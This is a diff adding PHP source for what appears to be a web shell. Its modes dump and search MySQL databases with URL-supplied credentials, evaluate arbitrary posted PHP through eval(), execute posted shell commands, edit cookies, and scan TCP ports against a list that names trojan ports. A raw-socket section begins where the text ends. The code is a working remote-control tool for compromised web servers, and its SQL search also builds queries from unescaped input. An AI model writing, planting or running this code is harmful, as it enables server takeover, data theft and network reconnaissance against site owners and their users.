+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Search
+########
+if ($_GET['dxmode']=='SQLS')
+	{
+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	if (isset($_POST['dxsqlsearch']['txt']))
+		if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" '
+				.(  (isset($_POST['dxsqlsearch']['tables']))?   ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'')   :'SELECTED'  ).'>'
+				.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">';
+	print "\n".'<br>';
+	foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad)
+		print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" '
+			.(  (isset($_POST['dxsqlsearch']['mode']))?   (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'')   :(($cur_rad=='Any')?'CHECKED':'')  )
+			.' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;';
+	print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+
+	if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>');
+
+	if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected'));
+
+	if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt']));
+		else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']);
+
+
+	$GLOBALFOUND=0;
+	foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE)
+		{		$Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE ';
+		$Q_ARR=array();
+		DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true);   for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0];
+		foreach ($COLS as $CUR_COL)
+			{			if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact')))
+				{				for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++)
+				$Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"';
+				}
+				else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0];
+
+			if ($_POST['dxsqlsearch']['mode']=='each')
+				{				$Q_ARR_EXACT[]=implode(' AND ', $Q_ARR);
+				$Q_ARR=array();
+				}
+			}
+		if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';';
+		if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );';
+		if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );';
+
+		/* $Q is ready */
+
+		if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0)
+			{
+			$GLOBALFOUND+=$num;			print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>';
+			print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>';
+			for ($l=0;$l<count($FETCHED);$l++)
+				{
+				print "\n\t".'<tr>';
+				for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>';
+				print '</tr>';
+				}
+			print "\n".'</table><br>';
+			}
+		}
+	print "\n".'<br>Total: '.$GLOBALFOUND.' matches';
+
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Dump
+########
+if ($_GET['dxmode']=='SQLD')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):';
+	print "\n".'<input type=text name="dxsql_q" style="width:100%;">';
+	print "\n".'<br>';
+	print "\n".'<div align=right>'
+		.'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10)
+		.'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+	}
+
+		###################################
+
+########
+########   PHP Console
+########
+if ($_GET['dxmode']=='PHP')
+	{
+	if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval'];
+
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">';
+	$PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>'
+						.(  ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3)  );
+	print "\n\n".'</td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']];
+			}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{		print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+		eval($_POST['dxval']);
+		print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>';
+		}
+	}
+
+		###################################
+
+########
+########  Cookies Maintenance
+########
+if ($_GET['dxmode']=='COOK')
+	{
+	if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =(');	print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s');
+
+	print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>';
+	for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--)
+		{
+		if ($maxlen>100) $maxlen=100;
+		if ($maxlen<30) $maxlen=30;
+		$maxlen+=3;
+		for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++)
+			{
+			if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;}
+			print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>'
+					.'<td class=linelisting><input type=text '
+							.'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"),  array('&quot;',' ',' ',' '), $INDEXES[$i]).']" '
+							.'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" '
+							.'SIZE='.$maxlen.'></td>'
+					.'</tr>';
+			}
+		if (!$look_len)
+			{
+			print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>';
+			print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>'
+					.'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>'
+					.'</tr>';			print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">'
+					.'<input type=submit value="Save" class="submit" style="width:50%;">'
+					.'</td></tr>';
+			}
+		}
+	print "\n".'</table></form>';
+	}
+
+		###################################
+
+########
+########   Command line
+########
+if ($_GET['dxmode']=='CMD')
+	{
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>';
+	print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">';
+	print "\n\t".'<OPTION></OPTION>';
+	$PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>';
+	print "\n\n".'</SELECT></td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
+			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']];
+			}
+
+	$warnstr=DxExecNahuj('',$trash1, $trash2);
+	if (!$warnstr[1]) DxWarning($warnstr[2]);	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Exec" class="submit" style="width:100pt;"> '
+				.'</div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
+		$_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval']));
+		for ($i=0; $i<count($_POST['dxval']); $i++)
+			{
+			$CUR=$_POST['dxval'][$i];
+			if (empty($CUR)) continue;
+
+			DxExecNahuj($CUR,$OUT, $RET);
+			print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+
+			print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>';
+			print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>';
+			print '<br><nobr>';
+			print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".(	(is_array($RET))?implode("\n", $RET):$RET).'</textarea>';
+			print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".(	(is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>';
+			print '</nobr>';
+			print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>';
+			}
+		}
+	}
+
+		###################################
+
+########
+########   String functions
+########
+if ($_GET['dxmode']=='STR')
+	{
+	if (isset($_POST['dxval'], $_POST['dxparam']))
+		{		$crypted='';
+		if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']);
+		if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']);
+		if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']);
+		if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']);
+		if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']);
+		if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' ';
+		if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));}
+		if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');}
+		if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']);
+		if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']);
+		}
+	if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = ';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>';
+	print "\n".'<div align=right>'
+		.'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5)
+		.'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> '
+		.'</div>';
+	print "\n".'</form>';
+	}
+
+########
+########   Port scaner
+########
+if ($_GET['dxmode']=='PRT')
+	{
+	print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>';	if (isset($_POST['dxportscan']) or isset($_GET['dxparam']))
+		$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',);
+
+	if (isset($_GET['dxparam']))
+		{		print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>';
+		$INDEXES=array_keys($DEF_PORTS);
+		for ($i=0;$i<count($INDEXES);$i++)
+			print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>';
+		print "\n".'</table>';
+		die();
+		}
+
+	if (isset($_POST['dxportscan']))
+		{		$OKAY_PORTS = 0;
+		$TOSCAN=array();
+
+		if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS);
+			else
+			{			$_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']);
+			for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++)
+				{				$_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]);
+				if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0];
+					else
+					$TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]);
+				$_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]);
+				}
+			$_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']);
+			}
+
+		print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>';
+		list($usec, $sec) = explode(' ', microtime());
+		$start=(float)$usec + (float)$sec;
+		for ($i=0;$i<count($TOSCAN);$i++)
+			{			$cur_port=&$TOSCAN[$i];
+			$fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']);
+			if ($fp)
+				{				$OKAY_PORTS++;
+				$port_name='';
+				if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port];
+				print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>';
+				}
+			}
+		list($usec, $sec) = explode(' ', microtime());
+		$end=(float)$usec + (float)$sec;
+
+		print "\n".'</table>';
+		print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>';
+		print "\n".'<br><hr>'."\n";
+		}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0>'
+		.'<tr>'
+			.'<td colspan=2>'
+			.'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>'
+			.'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>'
+		.'</tr><tr>'
+			.'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>'
+			.'</td><td>'
+				.'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>'
+				.'<br><input type=submit value="Scan" class="submit" style="width:100pt;">'
+		.'</tr></table></form>';
+	}
+
+########
+########   Raw s0cket
+########
+if ($_GET['dxmode']=='SOCK')
+	{
